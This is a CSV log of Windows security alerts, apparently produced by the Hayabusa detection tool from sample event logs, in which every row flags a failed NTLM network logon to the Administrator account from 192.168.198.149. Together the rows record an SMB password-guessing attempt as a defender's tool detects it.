2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ldbN1odP77n0BOzO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: drRC8qCbPe5e4mdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lBg39AUtzZi6Q4iz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: huv5YEPo1n7UiFkq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9CLLwao1NDtBulxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SB88EHHhDWhvJI87  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VtBvklueV4MZo3pJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: noha7Vw85VfURHik  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wl5eIYvoKpJGUcSl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsS3JTLUWcFYvxAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gjM6hj2bGxC124oZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3IQkVcY5iMTxCRN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v44Kp3lpGKb6Xd4j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1skdEmGlXbzUWk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feaA6lAxWjapFbAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJZjTqY5innWcvSZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymXIp0KTw0vIbB0N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpPJEcLv7BoZaQwT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cz14Cv861RhFh0Pa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H8BklDHdS0cdcbGu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0m5Mznl2khRMj31V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ha6TuN7C8V0roSAK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9oBW0yE5a9zSkpIH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n54EaKOUQIX9geqx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m6WCg3o4oatO42wW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KfCwo8ZUWiBqI8zC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8potisENMIsbNxcd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WgagMNj95dkg9uQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o1EVsGLFugwePvgR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q00SeueJQAiBGpe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWzSR1cJ2XJNirSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39MY5ZvRJSHVkZZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WyOdltctwdHNkH6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUcWk0xJn9zVMZSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2sauqNlJi3y0ZBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkih5QcLlcjw9gjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3KlUJslcpS9jhLY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: riuVWV1Ugr9c22hR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OSj1I0sXkPf96OL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsOJDxDiZSjoBj6F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uH0bQ9zEi1xcfHn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3AfNT0p4JC1VEfDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7T8R8U1WVHZQrYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kamexpa7isWT8gLC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8CyHFKVcdTo0Upx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U30aMcZuBD08GWK1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4mihftSCNCYdlBny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K2wa0xwK6tnurGJQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0V3TbNrKEnrDcEYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T73JW9JURm8Br6MA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OAleyg3h8aMvVVJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LQllnWZFUIWa6rw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlwPxSGUmvYH0rpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrI56o5TyeO48rQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CKRMn75tv5Yi5rYK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MbJvec7rVisJ6WCC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xoubp5WTPqblBaps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBczkR92cKY41icQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfUx3OizEb1LiOzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRaSOLOWhBEr0qkz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YnlI8Zh4td5m1fpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wXUDXDa4wi3HivKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TT7iOtVMFcEysCcI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1NJpI7KC3gj99aWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H39cv9JEuLEjlp93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4p9h1cjLeUzppSZb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0fOpi4vr55QmO6x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GiKI4V6kpkY5zc9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dLmu4n9qZdf3Q5zo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 87iJdX2E0ZJintvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxc4iIHP0kdqQNiG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJIWekwBwcIUWjD1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GdnvboiIDzXTZ8MR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
